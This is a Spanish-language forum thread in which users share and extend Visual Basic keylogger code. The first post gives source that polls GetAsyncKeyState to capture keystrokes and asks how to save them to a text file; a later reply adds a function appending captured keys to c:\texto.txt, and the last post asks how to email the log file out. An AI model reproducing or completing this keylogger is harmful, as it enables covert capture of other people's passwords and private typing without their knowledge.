Autor
|
Tema: Keylogger en VB ayuda (Leído 3,314 veces)
|
Za3LoT
|
Miren tenia este codigo que lo he cogido del tema de la recopilación de links.... Y me gustaria saber que modificaciones son necesarias para poder ejecutarlo y que me mande las pulsaciones de las teclas a un archivo .txt ' 'Módulo estándar basKeyLogger.bas ' Option Explicit
Public bLogEnabled As Boolean
Function GetActiveKey() As Integer Static bStarted As Boolean Dim i%
If Not bStarted Then 'Inicializa el estado de las teclas llamando a 'la función GetAsyncKeyState. ' For i = 1 To 256 Call GetAsyncKeyState(i) Next
bStarted = True End If
For i = 1 To 256 'Obtiene la tecla pulsada actualmente. ' If GetAsyncKeyState(i) Then GetActiveKey = i Exit For End If Next End Function
Sub StopLog() bLogEnabled = False End Sub
Sub LogKeys() Dim snTimer! Dim iActiveKey% Dim sChar$, sData$
bLogEnabled = True Do While bLogEnabled snTimer = Timer Do While (Timer - snTimer) < 0.125 'Espera 125 milisegundos hasta 'la próxima pulsación. Loop iActiveKey = GetActiveKey Select Case iActiveKey Case vbKey0 To vbKey9, 32 To 47, vbKeyA To vbKeyZ sChar = Chr$(iActiveKey) sData = sData & sChar Case vbKeyReturn 'Imprime lo que tiene en el buffer. ' Debug.Print sData sData = vbNullString Case Else 'Verifica otras teclas. End Select Loop S4Lu2!!
|
|
|
|
|
|
|
<--v1c1ous-->
¡Operadora! ¡Deme el número para el 911! - Homero
|
Hay un comentario muy lindo en tu codigo que dice "'Imprime lo que tiene en el buffer.", y una linea de codigo muy simpatica que dice "Debug.Print sData" que se activa al precionar Enter.
Ahi tenes la respuesta y podriamos ir dejando de lado el Scriptkiddies
|
|
|
|
|
|
|
Za3LoT
|
OK asias por la ayuda.
S4Lu2!!
|
|
|
|
|
|
|
Za3LoT
|
Si pone que "imprime lo que tiene en el buffer", pero donde lo imprime en algun archivo.txt?? por que de eso no pone nada creo yo.
S4Lu2!!
|
|
|
|
|
|
|
<--v1c1ous-->
¡Operadora! ¡Deme el número para el 911! - Homero
|
Si pone. Si lo corres en tu VB advertiras que imprime lo capturado en la ventana de Debug. Pone algo de entusiasmo, vamos... no respondere mas a este tema (Sin ofender).
|
|
|
|
|
|
|
Za3LoT
|
Vale, gracias por todo.
S4Lu2!!
|
|
|
|
|
|
|
X-TN
|
Hay otra posibilidad, y es mandar las teclas capturadas a un textbox y luego mandar eso a un txt. Public Function guardamos_teclas(contenido As String) Dim canal% contenido = Text1.Text canal = FreeFile Open "c:\texto.txt" For Append As canal Print #canal, contenido Close canal End Function Con esta función se guarda en un texto en c: Salu2
|
|
|
|
|
|
|
Hideki
|
Holas yo tengo un prog en vb parecido que genera un txt con todo lo escrito , mi pregunta es si hay forma de enviar ese archivo desde el mismo programa a un correo , he leido otros post de como enviar un mail desde vb con winsock pero no me resulta , existe otra forma , se puede conectar vb y php? , mi objetivo en si es hacer que ese archivo llegue a mi mail , agradeceria cualkier ayuda.
|
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |